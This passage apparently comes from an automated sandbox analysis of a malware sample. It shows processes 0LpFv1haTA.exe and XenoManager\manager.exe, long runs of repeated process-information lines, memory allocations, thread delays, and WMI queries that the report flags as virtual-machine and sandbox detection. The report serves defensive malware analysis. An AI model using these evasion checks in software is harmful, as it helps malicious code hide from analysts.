                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                      Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeMemory allocated: 19457EB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeMemory allocated: 194719C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 21F0F7E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 21F291E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 1E449B50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 1E461D40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 19233150000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 1924CB50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\manager.exeMemory allocated: 2370000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\manager.exeMemory allocated: 2500000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\manager.exeMemory allocated: 4500000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeMemory allocated: 30D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeMemory allocated: 3240000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeMemory allocated: 5240000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeMemory allocated: ED0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeMemory allocated: 2CA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeMemory allocated: 11E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 1B2AFA60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 1B2C9440000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 289898E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 289A3340000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 1ADB34F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeMemory allocated: 1ADCD070000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599762Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599649Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599422Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599188Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599078Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598725Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598625Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598516Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598406Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598297Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598078Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597731Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597625Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597296Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597076Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596857Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596738Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596624Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596500Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596391Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596172Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596062Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 595953Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 595844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 595719Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 595609Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 595500Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599765
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599656
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599546
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599437
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599328
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599218
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599109
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598997
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598875
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598765
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598651
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598531
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598421
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598203
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598093
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597933
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597812
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597702
